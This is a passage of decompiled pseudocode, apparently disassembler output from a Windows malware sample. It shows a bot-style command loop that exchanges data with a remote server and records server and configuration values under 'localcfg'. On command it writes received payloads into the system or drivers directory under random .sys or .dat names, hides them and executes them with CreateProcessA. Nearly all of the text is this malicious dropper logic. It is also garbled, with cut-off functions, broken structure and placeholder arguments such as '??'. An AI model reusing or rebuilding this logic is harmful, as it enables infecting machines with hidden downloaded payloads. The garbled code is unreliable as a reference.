						_v12 = 0;
						if( *((intOrPtr*)(_t747 * 0x45 + _t688 + 0x41)) != 0) {
							L11:
							_t748 = _t747 * 0x45;
							_t365 = _t748 + _t688;
							_t689 =  *((intOrPtr*)(_t748 + _t688 + 0x41));
							if( *((intOrPtr*)(_t748 + _t688 + 0x41)) == 0) {
								goto L21;
							}
							_t368 = E0040F428(E00402684(_t365 + 1), _t689);
							_v16 = _t368;
							_t829 = _t368;
							if(_t368 > 0) {
								_t369 = E0040F43E(_t368,  &_v640, 0xc8, 0);
								_t809 = _t808 + 0x10;
								__eflags = _t369 - 0xc8;
								if(__eflags == 0) {
									E00408F53( &_v640, 0xc8);
									__eflags = _v500 - 0xff;
									_pop(_t695);
									if(__eflags > 0) {
										goto L15;
									}
									__eflags = _v512 - 7;
									if(__eflags > 0) {
										goto L15;
									}
									__eflags = _v508 - 7;
									if(__eflags > 0) {
										goto L15;
									}
									 *0x413684 = 1;
									 *0x413678 = 0;
									 *0x41367c = 0;
									E0040EA84(1, "localcfg", "ip", _v496);
									_v104 = E0040F04E(0);
									_v100 = _t748;
									E0040EA84(1, "localcfg", "srv_time", _v492);
									E0040EA84(1, "localcfg", "local_time", _v104);
									E00408FB6( &_v440,  &_v640);
									E00408FB6( &_v92,  &_v640);
									E0040EE2A(_t695,  &_v740, 0, 0x64);
									_v728 = 1;
									_v688 = 0x100007f;
									_v732 = 1;
									_v720 = 0x1f;
									_v736 = 0;
									_v39 = 0x37;
									_t388 = E0040C65C(_v16,  &_v640,  &_v92, 0x412118, 0x64,  &_v52);
									_t811 = _t809 + 0x68;
									__eflags = _t388;
									if(_t388 > 0) {
										 *0x412148 = 0;
										 *0x41215a = 0;
										while(1) {
											L24:
											_t757 = _v16;
											_t392 = E0040C75D(_v16,  &_v640,  &_v440,  *0x4136b0, 0x100000,  &_v52);
											_t811 = _t811 + 0x18;
											__eflags = _t392 - 0xfffffffe;
											if(_t392 == 0xfffffffe) {
												break;
											}
											__eflags = _t392;
											if(_t392 < 0) {
												continue;
											}
											_t395 = _v39;
											__eflags = _t395;
											if(_t395 == 0) {
												_t789 = 1;
												__eflags = 1;
												do {
													_t398 = 1 << _t789;
													__eflags = _v35 & _t398;
													if((_v35 & _t398) != 0) {
														__eflags =  *(_t789 + 0x41215c);
														if( *(_t789 + 0x41215c) == 0) {
															__eflags = _t789 - 3;
															if(_t789 != 3) {
																E0040F1ED(_t789,  &_v96, 0xa);
																E0040E654(E00408C51, 5,  &_v96);
																_t811 = _t811 + 0x18;
															}
														}
													}
													_t789 = _t789 + 1;
													__eflags = _t789 - 0x20;
												} while (_t789 < 0x20);
												continue;
											}
											__eflags = _t395 - 1;
											if(_t395 == 1) {
												_t403 =  *0x4136b0;
												_t697 =  *_t403;
												_v24 = _t697;
												_t748 = _t403[4];
												_v76 = _t748;
												__eflags = _t697 & 0x00000018;
												if((_t697 & 0x00000018) == 0) {
													L177:
													__eflags = _v24 & 0x00000001;
													if((_v24 & 0x00000001) == 0) {
														L179:
														__eflags = _v24 & 0x00000004;
														if((_v24 & 0x00000004) == 0) {
															L182:
															__eflags = _v24 & 0x00000040;
															if((_v24 & 0x00000040) == 0) {
																L186:
																__eflags = _v24 & 0x00000080;
																if((_v24 & 0x00000080) == 0) {
																	L199:
																	__eflags = _v24 & 0x00000100;
																	if((_v24 & 0x00000100) == 0) {
																		L204:
																		__eflags = _v24 & 0x00000400;
																		if((_v24 & 0x00000400) == 0) {
																			L215:
																			_v8 = 0;
																			while(1) {
																				__eflags = _v64;
																				if(_v64 != 0) {
																					goto L228;
																				}
																				_t328 =  &(_v8[0x413300]); // 0x6e0020bc
																				_t758 =  *_t328;
																				__eflags = _t758;
																				if(_t758 == 0) {
																					L225:
																					_v8 =  &(_v8[4]);
																					__eflags = _v8 - 0x80;
																					if(_v8 < 0x80) {
																						continue;
                                                                                																					}
                                                                                																					__eflags = _v64;
                                                                                																					if(_v64 != 0) {
                                                                                																						goto L228;
                                                                                																					}
                                                                                																					_v39 = 0;
                                                                                																					_t408 = E0040C65C(_v16,  &_v640,  &_v92,  *0x4136b0, 0,  &_v52);
                                                                                																					_t811 = _t811 + 0x18;
                                                                                																					__eflags = _t408;
                                                                                																					if(_t408 > 0) {
                                                                                																						goto L24;
                                                                                																					}
                                                                                																					goto L228;
                                                                                																				}
                                                                                																				_t409 =  *(_t758 + 0x4c);
                                                                                																				__eflags = _t409;
                                                                                																				if(_t409 == 0) {
                                                                                																					goto L225;
                                                                                																				}
                                                                                																				_t410 =  *_t409( &_v76,  &_v39,  *0x4136b0, 0x100000);
                                                                                																				while(1) {
                                                                                																					_t811 = _t811 + 0x10;
                                                                                																					_v52 = _t410;
                                                                                																					__eflags = _t410;
                                                                                																					if(_t410 <= 0) {
                                                                                																						break;
                                                                                																					}
                                                                                																					_t413 = E0040C65C(_v16,  &_v640,  &_v92,  *0x4136b0, _t410,  &_v52);
                                                                                																					_t811 = _t811 + 0x18;
                                                                                																					__eflags = _t413;
                                                                                																					if(_t413 <= 0) {
                                                                                																						_v64 = 1;
                                                                                																						goto L225;
                                                                                																					}
                                                                                																					_t410 =  *(_t758 + 0x4c)( &_v76,  &_v39,  *0x4136b0, 0x100000);
                                                                                																				}
                                                                                																				goto L225;
                                                                                																			}
                                                                                																			break;
                                                                                																		}
                                                                                																		_t416 = E00407DD6(_t748);
                                                                                																		__eflags = _t416;
                                                                                																		if(_t416 != 0) {
                                                                                																			goto L215;
                                                                                																		}
                                                                                																		_t417 = E0040F04E(0);
                                                                                																		__eflags =  *0x4136ac - _t748;
                                                                                																		if(__eflags > 0) {
                                                                                																			goto L215;
                                                                                																		}
                                                                                																		if(__eflags < 0) {
                                                                                																			L209:
                                                                                																			__eflags =  *0x4121a8; // 0x0
                                                                                																			if(__eflags == 0) {
                                                                                																				goto L215;
                                                                                																			}
                                                                                																			__eflags =  *0x4121a4; // 0x0
                                                                                																			if(__eflags != 0) {
                                                                                																				L214:
                                                                                																				_t418 =  *0x4136b0;
                                                                                																				 *_t418 = 0;
                                                                                																				_t733 =  *0x4121a4; // 0x0
                                                                                																				_t418[4] = _t733;
                                                                                																				_t734 =  *0x4122d4; // 0x0
                                                                                																				_t418[8] = _t734;
                                                                                																				_v39 = 0x34;
                                                                                																				_t421 = E0040C65C(_v16,  &_v640,  &_v92, _t418, 0xc,  &_v52);
                                                                                																				_t811 = _t811 + 0x18;
                                                                                																				__eflags = _t421;
                                                                                																				if(_t421 <= 0) {
                                                                                																					break;
                                                                                																				}
                                                                                																				goto L215;
                                                                                																			}
                                                                                																			_t791 = E0040675C(0x4121a8,  &_v72, 0);
                                                                                																			_t811 = _t811 + 0xc;
                                                                                																			__eflags = _t791;
                                                                                																			if(_t791 != 0) {
                                                                                																				 *0x4122d4 = E004024C2(_t791, _v72, 0);
                                                                                																				 *0x4121a4 = _v72;
                                                                                																				E0040EC2E(_t791);
                                                                                																				_t811 = _t811 + 0x10;
                                                                                																			}
                                                                                																			__eflags =  *0x4121a4; // 0x0
                                                                                																			if(__eflags == 0) {
                                                                                																				goto L215;
                                                                                																			} else {
                                                                                																				goto L214;
                                                                                																			}
                                                                                																		}
                                                                                																		__eflags =  *0x4136a8 - _t417;
                                                                                																		if( *0x4136a8 > _t417) {
                                                                                																			goto L215;
                                                                                																		}
                                                                                																		goto L209;
                                                                                																	}
                                                                                																	E0040E854(1, "localcfg", "except_info",  *0x4136b0, 0x100000, 0x410264);
                                                                                																	_t428 =  *0x4136b0;
                                                                                																	_t811 = _t811 + 0x18;
                                                                                																	_t736 =  &(_t428[1]);
                                                                                																	do {
                                                                                																		_t748 =  *_t428;
                                                                                																		_t428 =  &(_t428[1]);
                                                                                																		__eflags = _t748;
                                                                                																	} while (_t748 != 0);
                                                                                																	_t429 = _t428 - _t736;
                                                                                																	_v12 = _t429;
                                                                                																	__eflags = _t429;
                                                                                																	if(_t429 <= 0) {
                                                                                																		goto L204;
                                                                                																	}
                                                                                																	E0040E8A1(_t748, 1, "localcfg", "except_info", 0x410264);
                                                                                																	_v39 = 0xf;
                                                                                																	_t434 = E0040C65C(_v16,  &_v640,  &_v92,  *0x4136b0, _v12,  &_v52);
                                                                                																	_t811 = _t811 + 0x28;
                                                                                																	__eflags = _t434;
                                                                                																	if(_t434 <= 0) {
                                                                                																		break;
                                                                                																	}
                                                                                																	goto L204;
                                                                                																}
                                                                                																_t760 = 0;
                                                                                																__eflags =  *0x412184; // 0x0
                                                                                																if(__eflags != 0) {
                                                                                																	E00406F5F( &_v408, 0x120);
                                                                                																	_t449 =  *0x412130; // 0x0
                                                                                																	_push(0x412184);
                                                                                																	asm("sbb eax, eax");
                                                                                																	_push( &_v408);
                                                                                																	_t453 = ( ~(_t449 & 0x00000600) & 0x00000020) + 0x20;
                                                                                																	__eflags = _t453;
                                                                                																	_push(_t453);
                                                                                																	_push( *0x412159 & 0x000000ff);
                                                                                																	_push( *0x412134);
                                                                                																	_push( *0x412120);
                                                                                																	_t456 = wsprintfA( *0x4136b0, E00402544("PromptOnSecureDesktop", 0x410fa0, 0x27, 0xe4, 0xc8));
                                                                                																	_t811 = _t811 + 0x34;
                                                                                																	_t760 = _t456;
                                                                                																}
                                                                                																_t793 =  *0x4122d8; // 0x0
                                                                                																__eflags = _t793;
                                                                                																if(_t793 == 0) {
                                                                                																	L193:
                                                                                																	__eflags = _t760;
                                                                                																	if(_t760 == 0) {
                                                                                																		goto L199;
                                                                                																	}
                                                                                																	_v39 = 0xb;
                                                                                																	_t438 = E0040C65C(_v16,  &_v640,  &_v92,  *0x4136b0, _t760,  &_v52);
                                                                                																	_t811 = _t811 + 0x18;
                                                                                																	__eflags = _t438;
                                                                                																	if(_t438 <= 0) {
                                                                                																		break;
                                                                                																	}
                                                                                																	__eflags =  *0x412184; // 0x0
                                                                                																	if(__eflags != 0) {
                                                                                																		 *0x412184 = 0;
                                                                                																	}
                                                                                																	_t439 =  *0x4122d8; // 0x0
                                                                                																	__eflags = _t439;
                                                                                																	if(_t439 != 0) {
                                                                                																		E0040EC2E(_t439);
                                                                                																		 *0x4122d8 = 0;
                                                                                																	}
                                                                                																	goto L199;
                                                                                																} else {
                                                                                																	_t441 = _t793;
                                                                                																	_t293 = _t441 + 1; // 0x1
                                                                                																	_t738 = _t293;
                                                                                																	do {
                                                                                																		_t748 =  *_t441;
                                                                                																		_t441 = _t441 + 1;
                                                                                																		__eflags = _t748;
                                                                                																	} while (_t748 != 0);
                                                                                																	_v60 = _t441 - _t738;
                                                                                																	E0040EE08( &(( *0x4136b0)[_t760]), _t793, _t441 - _t738 + 1);
                                                                                																	_t811 = _t811 + 0xc;
                                                                                																	_t760 =  &(_v60[_t760]);
                                                                                																	__eflags = _t760;
                                                                                																	goto L193;
                                                                                																}
                                                                                															}
                                                                                															while(1) {
                                                                                																_t459 = E0040C06C( &_v24,  &_v39,  *0x4136b0, 0x100000);
                                                                                																_t811 = _t811 + 0x10;
                                                                                																__eflags = _t459;
                                                                                																if(_t459 == 0) {
                                                                                																	goto L186;
                                                                                																}
                                                                                																_t462 = E0040C65C(_t757,  &_v640,  &_v92,  *0x4136b0, _t459,  &_v52);
                                                                                																_t811 = _t811 + 0x18;
                                                                                																__eflags = _t462;
                                                                                																if(_t462 <= 0) {
                                                                                																	goto L228;
                                                                                																}
                                                                                															}
                                                                                															goto L186;
                                                                                														}
                                                                                														_push(0x71c7);
                                                                                														_push( *0x4136b0);
                                                                                														_t463 = E0040E7B4();
                                                                                														__eflags = _t463;
                                                                                														if(_t463 <= 0) {
                                                                                															goto L182;
                                                                                														}
                                                                                														_v39 = 2;
                                                                                														_t467 = E0040C65C(_t757,  &_v640,  &_v92,  *0x4136b0, _t463 * 0x24,  &_v52);
                                                                                														_t811 = _t811 + 0x18;
                                                                                														__eflags = _t467;
                                                                                														if(_t467 <= 0) {
                                                                                															break;
                                                                                														}
                                                                                														goto L182;
                                                                                													}
                                                                                													E00403A00(_t697,  *0x4136b0);
                                                                                													_v39 = 3;
                                                                                													_t472 = E0040C65C(_t757,  &_v640,  &_v92,  *0x4136b0, 0x28,  &_v52);
                                                                                													_t811 = _t811 + 0x1c;
                                                                                													__eflags = _t472;
                                                                                													if(_t472 <= 0) {
                                                                                														break;
                                                                                													}
                                                                                													goto L179;
                                                                                												}
                                                                                												_push(_t697);
                                                                                												_push(0x100000);
                                                                                												_push(_t403);
                                                                                												while(1) {
                                                                                													_t473 = E00403C09(_t748);
                                                                                													_t811 = _t811 + 0xc;
                                                                                													__eflags = _t473;
                                                                                													if(_t473 == 0) {
                                                                                														goto L177;
                                                                                													}
                                                                                													_t697 =  &_v52;
                                                                                													_v39 = 4;
                                                                                													_t476 = E0040C65C(_t757,  &_v640,  &_v92,  *0x4136b0, _t473,  &_v52);
                                                                                													_t811 = _t811 + 0x18;
                                                                                													__eflags = _t476;
                                                                                													if(_t476 <= 0) {
                                                                                														goto L228;
                                                                                													}
		_t478 = _v24 & 0x00000010;
		__eflags = _t478;
		_push(_t478);
		_push(0x100000);
		_push( *0x4136b0);
	}
	goto L177;
}
__eflags = _t395 - 2;
if(_t395 == 2) {
	_t479 = E0040DF4C(_t748,  *0x4136b0);
	__eflags = _t479;
	if(_t479 != 0) {
		E0040ED3B( &(( *0x4136b0)[4]), "work_srv", 8);
		_t483 =  *0x4136b0;
		_t811 = _t811 + 0xc;
		__eflags =  *_t483 - 1;
		if( *_t483 == 1) {
			_t485 = E0040EED1( &(_t483[4]), "work_srv");
			__eflags = _t485;
			if(_t485 == 0) {
				 *0x413680 = 0;
				 *0x413674 = 0;
				 *0x413678 = 0;
				 *0x41367c = 0;
				E0040C517();
				_v68 = 1;
			}
		}
	}
	continue;
}
__eflags = _t395 - 0xa;
if(__eflags == 0) {
	E004031D0( *0x4136b0, _v52);
	L46:
	continue;
}
if(__eflags <= 0) {
	L156:
	_t763 = 0;
	__eflags = 0;
	do {
		_t488 =  *(_t763 + 0x413300);
		__eflags = _t488;
		if(_t488 == 0) {
			goto L165;
		}
		_t795 =  *(_t488 + 0x40);
		__eflags = _t795;
		if(_t795 == 0) {
			goto L165;
		}
		_t748 = 0;
		_t489 = _t488 + 0xc;
		__eflags = _t489;
		while(1) {
			_t705 =  *_t489;
			__eflags = _t705;
			if(_t705 == 0) {
				goto L165;
			}
			__eflags = _t705 - _v39;
			if(_t705 == _v39) {
				 *_t795(_v39,  *0x4136b0, _v52);
				_t811 = _t811 + 0xc;
				goto L165;
			}
			_t748 = _t748 + 1;
			_t489 = _t489 + 4;
			__eflags = _t748 - 0xa;
			if(_t748 < 0xa) {
				continue;
			}
			goto L165;
		}
		L165:
		_t763 = _t763 + 4;
		__eflags = _t763 - 0x80;
	} while (_t763 < 0x80);
	continue;
}
__eflags = _t395 - 0xc;
if(_t395 <= 0xc) {
	_t796 =  *0x4136b0;
	_t764 = 0;
	_v60 = 0;
	_v8 = _t796;
	__eflags =  *_t796;
	if( *_t796 <= 0) {
		L57:
		_t491 = _t764;
		_t797 =  &(( *0x4136b0)[4 + _t491 * 8]);
		_t492 = _v52 + 4 + _t491 * 8;
		_t704 = _t797[0x124] + 0x128;
		_v8 = _t492;
		__eflags = _t797[0x124] + 0x128 - _t492;
		while(1) {
			_v12 = 0;
			if(__eflags > 0) {
				break;
			}
			__eflags = _v8;
			if(_v8 <= 0) {
				break;
			}
			__eflags =  *_t797 & 0x00000003;
			if(( *_t797 & 0x00000003) == 0) {
				L150:
				_t494 = _t797[0x124];
				_t704 = 0xfffffed8 - _t494;
				_v8 =  &(_v8[0xfffffffffffffed8]);
				_t797 =  &(_t797[_t494 + 0x128]);
				__eflags = _t797[0x124] + 0x128 - _v8;
				continue;
			} else {
				E0040EE2A(_t704,  &_v408, 0, 0x120);
				_t499 =  *_t797;
				_t811 = _t811 + 0xc;
				_t765 = 0;
				_t711 = 0x100;
				__eflags = _t499 & 0x00000f80;
				if((_t499 & 0x00000f80) == 0) {
					_t618 = _t499 | 0x00000100;
					__eflags = _t618;
					 *_t797 = _t618;
				}
				_t500 =  *_t797;
				__eflags = _t500 & 0x00000800;
				if((_t500 & 0x00000800) != 0) {
					_t616 = _t500 & 0xfffff7ff;
					 *_t797 = _t616;
					__eflags =  *0x41201e; // 0x0
					if(__eflags == 0) {
						_t617 = _t616 | 0x00000200;
						__eflags = _t617;
					} else {
						_t617 = _t616 | _t711;
					}
					 *_t797 = _t617;
				}
				_t501 =  *_t797;
				__eflags = _t501;
				if(_t501 >= 0) {
					__eflags = _t711 & _t501;
					if((_t711 & _t501) == 0) {
						__eflags = _t501 & 0x00000200;
						if((_t501 & 0x00000200) == 0) {
							__eflags = _t501 & 0x00000400;
							if((_t501 & 0x00000400) == 0) {
								goto L96;
							}
							GetSystemDirectoryA( &_v408, 0x100);
							_t595 =  &_v408;
							_t775 = _t595 + 1;
							do {
								_t723 =  *_t595;
								_t595 = _t595 + 1;
								__eflags = _t723;
							} while (_t723 != 0);
							_t596 = _t595 - _t775;
							__eflags = _t596;
							if(_t596 != 0) {
								__eflags =  *((char*)(_t806 + _t596 - 0x195)) - 0x5c;
								if( *((char*)(_t806 + _t596 - 0x195)) != 0x5c) {
									 *((char*)(_t806 + _t596 - 0x194)) = 0x5c;
								}
							}
							E0040EF1E( &_v408, "drivers\\");
							_t776 =  &_v408;
							_t141 = _t776 + 1; // 0x5d
							_t711 = _t141;
							do {
								_t599 =  *_t776;
								_t776 = _t776 + 1;
								__eflags = _t599;
							} while (_t599 != 0);
							_t765 = _t776 - _t711;
							__eflags = _t765;
							goto L96;
						}
						GetSystemDirectoryA( &_v408, 0x100);
						_t777 =  &_v408;
						_t602 = _t777 + 1;
						do {
							_t711 =  *_t777;
							_t777 = _t777 + 1;
							__eflags = _t711;
						} while (_t711 != 0);
						_t765 = _t777 - _t602;
						__eflags = _t765;
						goto L83;
					} else {
						GetEnvironmentVariableA(E00402544(0x4122f8, 0x410a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
						E0040EE2A(_t711, 0x4122f8, 0, 0x100);
						_t607 =  &_v408;
						_t811 = _t811 + 0x20;
						_t779 = _t607 + 1;
						do {
							_t711 =  *_t607;
							_t607 = _t607 + 1;
							__eflags = _t711;
						} while (_t711 != 0);
						_t765 = _t607 - _t779;
						L83:
						__eflags = _t765;
						if(_t765 == 0) {
							goto L96;
						}
						__eflags =  *((char*)(_t806 + _t765 - 0x195)) - 0x5c;
						goto L85;
					}
				} else {
					_t780 =  &(_t797[4]);
					_t609 =  &(_t797[4]);
					_t726 =  &(_t609[1]);
					goto L69;
					do {
						L71:
						_t711 =  *_t613;
						_t613 = _t613 + 1;
						__eflags = _t711;
					} while (_t711 != 0);
					_t765 = _t613 - _t781;
					__eflags = _t765;
					if(_t765 == 0) {
						L96:
						__eflags =  *_t797 & 0x00000004;
						if(( *_t797 & 0x00000004) == 0) {
							_t502 =  &(_t797[0x104]);
							L106:
							_push(_t502);
							L107:
							lstrcatA( &_v408, ??);
							L108:
							__eflags =  *_t797 & 0x00000040;
							if(( *_t797 & 0x00000040) != 0) {
								E00408E26(_t711, _t748, 0x22c808, 0, 0, 0, 0,  &_v56);
								_t811 = _t811 + 0x18;
							}
							__eflags = _v39 - 0xc;
							if(_v39 == 0xc) {
								_t583 = E0040EE95( &_v408, ".dat");
								_pop(_t711);
								__eflags = _t583;
								if(_t583 != 0) {
									SetFileAttributesA( &_v408, 0x80);
								}
							}
							_t766 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
							__eflags = _t766 - 0xffffffff;
							if(_t766 == 0xffffffff) {
								E0040EE2A(_t711,  &_v408, 0, 0x120);
								GetEnvironmentVariableA(E00402544("PromptOnSecureDesktop", 0x410a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
								E0040EE2A(_t711, "PromptOnSecureDesktop", 0, 0x100);
								_t513 =  &_v408;
								_t811 = _t811 + 0x2c;
								_t768 = _t513 + 1;
								do {
									_t712 =  *_t513;
									_t513 = _t513 + 1;
									__eflags = _t712;
								} while (_t712 != 0);
								_t514 = _t513 - _t768;
								__eflags = _t514;
								if(_t514 != 0) {
									__eflags =  *((char*)(_t806 + _t514 - 0x195)) - 0x5c;
									if( *((char*)(_t806 + _t514 - 0x195)) != 0x5c) {
										 *((char*)(_t806 + _t514 - 0x194)) = 0x5c;
									}
								}
								lstrcatA( &_v408,  &(_t797[0x104]));
								__eflags = _v39 - 0xc;
								if(_v39 == 0xc) {
									_t545 = E0040EE95( &_v408, ".dat");
									_pop(_t712);
									__eflags = _t545;
									if(_t545 != 0) {
										SetFileAttributesA( &_v408, 0x80);
									}
								}
								_t769 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
								__eflags = _t769 - 0xffffffff;
								if(_t769 != 0xffffffff) {
									WriteFile(_t769,  &(_t797[0x128]), _t797[0x124],  &_v56, 0);
									CloseHandle(_t769);
									__eflags = _v39 - 0xc;
									if(_v39 == 0xc) {
										_t541 = E0040EE95( &_v408, ".dat");
										_pop(_t712);
										__eflags = _t541;
										if(_t541 != 0) {
											SetFileAttributesA( &_v408, 2);
										}
									}
									_v12 = 1;
								}
								goto L143;
							} else {
								WriteFile(_t766,  &(_t797[0x128]), _t797[0x124],  &_v56, 0);
								CloseHandle(_t766);
								__eflags = _v39 - 0xc;
								if(_v39 == 0xc) {
									_t579 = E0040EE95( &_v408, ".dat");
									__eflags = _t579;
									if(_t579 != 0) {
										SetFileAttributesA( &_v408, 2);
									}
								}
								_v12 = 1;
								_t552 = E0040EE95( &_v408, ".dat");
								_pop(_t712);
                                                                                																			__eflags = _t552;
                                                                                																			if(_t552 == 0) {
                                                                                																				L143:
                                                                                																				__eflags =  *_t797 & 0x00000040;
                                                                                																				if(( *_t797 & 0x00000040) != 0) {
                                                                                																					E00408E26(_t712, _t748, 0x22c80c, 0, 0, 0, 0,  &_v56);
                                                                                																					_t811 = _t811 + 0x18;
                                                                                																				}
                                                                                																				__eflags =  *_t797 & 0x00000002;
                                                                                																				if(( *_t797 & 0x00000002) != 0) {
                                                                                																					__eflags = _v12;
                                                                                																					if(__eflags != 0) {
                                                                                																						E00407EAD(_t748, __eflags, 1);
                                                                                																						E00407FCF(_t712);
                                                                                																						_t770 = 0x44;
                                                                                																						E0040EE2A(_t712,  &_v876, 0, _t770);
                                                                                																						_t811 = _t811 + 0x10;
                                                                                																						_v876.cb = _t770;
                                                                                																						_t527 = CreateProcessA( &_v408, 0x410264, 0, 0, 0, 0x8000000, 0, 0,  &_v876,  &_v424);
                                                                                																						__eflags = _t527;
                                                                                																						if(_t527 == 0) {
                                                                                																							E00407EE6(_t712);
                                                                                																							E00407EAD(_t748, __eflags, 0);
                                                                                																							DeleteFileA( &_v408);
                                                                                																						} else {
                                                                                																							CloseHandle(_v424.hThread);
                                                                                																							CloseHandle(_v424);
                                                                                																						}
                                                                                																					}
                                                                                																				}
                                                                                																				goto L150;
                                                                                																			} else {
                                                                                																				E0040EE2A(_t712,  &_v408, 0, 0x120);
                                                                                																				GetEnvironmentVariableA(E00402544("PromptOnSecureDesktop", 0x410a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
                                                                                																				E0040EE2A(_t712, "PromptOnSecureDesktop", 0, 0x100);
                                                                                																				_t559 =  &_v408;
                                                                                																				_t811 = _t811 + 0x2c;
                                                                                																				_t773 = _t559 + 1;
                                                                                																				do {
                                                                                																					_t712 =  *_t559;
                                                                                																					_t559 = _t559 + 1;
                                                                                																					__eflags = _t712;
                                                                                																				} while (_t712 != 0);
                                                                                																				_t560 = _t559 - _t773;
                                                                                																				__eflags = _t560;
                                                                                																				if(_t560 != 0) {
                                                                                																					__eflags =  *((char*)(_t806 + _t560 - 0x195)) - 0x5c;
                                                                                																					if( *((char*)(_t806 + _t560 - 0x195)) != 0x5c) {
                                                                                																						 *((char*)(_t806 + _t560 - 0x194)) = 0x5c;
                                                                                																					}
                                                                                																				}
                                                                                																				lstrcatA( &_v408,  &(_t797[0x104]));
                                                                                																				__eflags = _v39 - 0xc;
                                                                                																				if(_v39 == 0xc) {
                                                                                																					_t575 = E0040EE95( &_v408, ".dat");
                                                                                																					_pop(_t712);
                                                                                																					__eflags = _t575;
                                                                                																					if(_t575 != 0) {
                                                                                																						SetFileAttributesA( &_v408, 0x80);
                                                                                																					}
                                                                                																				}
                                                                                																				_t774 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
                                                                                																				__eflags = _t774 - 0xffffffff;
                                                                                																				if(_t774 != 0xffffffff) {
                                                                                																					WriteFile(_t774,  &(_t797[0x128]), _t797[0x124],  &_v56, 0);
                                                                                																					CloseHandle(_t774);
                                                                                																					__eflags = _v39 - 0xc;
                                                                                																					if(_v39 == 0xc) {
                                                                                																						_t571 = E0040EE95( &_v408, ".dat");
                                                                                																						_pop(_t712);
                                                                                																						__eflags = _t571;
                                                                                																						if(_t571 != 0) {
                                                                                																							SetFileAttributesA( &_v408, 2);
                                                                                																						}
                                                                                																					}
                                                                                																				}
                                                                                																				goto L143;
                                                                                																			}
                                                                                																		}
                                                                                																	}
                                                                                																	_t588 = E0040ECA5();
                                                                                																	_t711 = 5;
                                                                                																	_t748 = _t588 % _t711 + 3;
                                                                                																	__eflags = _t748;
                                                                                																	_v17 = _t748;
                                                                                																	if(_t748 == 0) {
                                                                                																		L99:
                                                                                																		 *(_t806 + _t765 - 0x194) = 0;
                                                                                																		_t590 =  *_t797;
                                                                                																		__eflags = _t590 & 0x0000000a;
                                                                                																		if((_t590 & 0x0000000a) != 0) {
                                                                                																			_t502 = E00402544("PromptOnSecureDesktop", 0x410694, 5, 0xe4, 0xc8);
                                                                                																			_t811 = _t811 + 0x14;
                                                                                																			goto L106;
                                                                                																		}
                                                                                																		__eflags = _t590 & 0x00000010;
                                                                                																		if((_t590 & 0x00000010) == 0) {
                                                                                																			__eflags = _t590 & 0x00000020;
                                                                                																			if((_t590 & 0x00000020) == 0) {
                                                                                																				goto L108;
                                                                                																			}
                                                                                																			_push(".dat");
                                                                                																			goto L107;
                                                                                																		}
                                                                                																		_push(".sys");
                                                                                																		goto L107;
                                                                                																	} else {
                                                                                																		goto L98;
                                                                                																	}
                                                                                																	do {
                                                                                																		L98:
                                                                                																		_t591 = E0040ECA5();
                                                                                																		_t711 = 0x19;
                                                                                																		_t748 = _t591 % _t711 + 0x61;
                                                                                																		 *(_t806 + _t765 - 0x194) = _t748;
                                                                                																		_t765 = _t765 + 1;
                                                                                																		_t155 =  &_v17;
                                                                                																		 *_t155 = _v17 - 1;
                                                                                																		__eflags =  *_t155;
                                                                                																	} while ( *_t155 != 0);
                                                                                																	goto L99;
                                                                                																}
                                                                                																_t615 =  *((intOrPtr*)(_t806 + _t765 - 0x195));
                                                                                																__eflags = _t615 - 0x5c;
                                                                                																if(_t615 != 0x5c) {
                                                                                																	__eflags = _t615 - 0x2f;
                                                                                																	L85:
                                                                                																	if(__eflags != 0) {
                                                                                																		 *(_t806 + _t765 - 0x194) = 0x5c;
                                                                                																		_t765 = _t765 + 1;
                                                                                																	}
                                                                                																}
                                                                                																goto L96;
                                                                                																L69:
                                                                                																_t748 =  *_t609;
                                                                                																_t609 =  &(_t609[1]);
                                                                                																__eflags = _t748;
                                                                                																if(_t748 != 0) {
                                                                                																	goto L69;
                                                                                																} else {
                                                                                																	__eflags = _t609 - _t726;
                                                                                																	E0040EE08( &_v408, _t780, _t609 - _t726);
                                                                                																	_t613 =  &_v408;
                                                                                																	_t811 = _t811 + 0xc;
                                                                                																	_t781 = _t613 + 1;
                                                                                																	goto L71;
                                                                                																}
                                                                                															}
                                                                                														}
                                                                                													}
                                                                                													__eflags =  *0x41211c & 0x00000004;
                                                                                													if(( *0x41211c & 0x00000004) == 0) {
                                                                                														continue;
                                                                                													}
                                                                                													__eflags = _v60;
                                                                                													if(_v60 == 0) {
                                                                                														continue;
                                                                                													}
                                                                                													__eflags =  *0x41201d; // 0x0
                                                                                													if(__eflags == 0) {
                                                                                														continue;
                                                                                													}
                                                                                													__imp__#3(_v16);
                                                                                													Sleep(0x3e8);
                                                                                													E0040E318();
                                                                                													ExitProcess(0);
                                                                                												} else {
                                                                                													_t798 =  &(_t796[8]);
                                                                                													__eflags = _t798;
                                                                                													do {
                                                                                														_t621 =  *(_t798 - 4);
                                                                                														__eflags = _t621;
                                                                                														if(_t621 == 0) {
                                                                                															_v60 = 1;
                                                                                															 *0x412138 =  *_t798;
                                                                                														} else {
                                                                                															_t624 = _t621 - 1;
                                                                                															__eflags = _t624;
                                                                                															if(_t624 == 0) {
                                                                                																E0040EA84(1, "localcfg", "lid_file_upd",  *_t798);
                                                                                																_t811 = _t811 + 0x10;
                                                                                																 *0x41213c =  *_t798;
                                                                                															} else {
                                                                                																__eflags = _t624 == 1;
                                                                                																if(_t624 == 1) {
                                                                                																	E0040EA84(1, "localcfg", "flags_upd",  *_t798);
                                                                                																	_t811 = _t811 + 0x10;
                                                                                																	 *0x41211c =  *0x41211c |  *_t798;
                                                                                																}
                                                                                															}
                                                                                														}
                                                                                														_t764 = _t764 + 1;
                                                                                														_t798 =  &(_t798[2]);
                                                                                														__eflags = _t764 -  *_v8;
                                                                                													} while (_t764 <  *_v8);
                                                                                													goto L57;
                                                                                												}
                                                                                											}
                                                                                											__eflags = _t395 - 0x1b;
                                                                                											if(_t395 != 0x1b) {
                                                                                												goto L156;
                                                                                											}
                                                                                											__eflags = _v52 - 0xc;
                                                                                											if(_v52 <= 0xc) {
                                                                                												_t630 =  *0x4136b0;
                                                                                												 *0x4121a4 = _t630[4];
                                                                                												 *0x4122d4 = _t630[8];
                                                                                												_t632 = E0040F04E(0);
                                                                                												asm("adc edx, ebx");
                                                                                												 *0x4136a8 = _t632 + 0xe10;
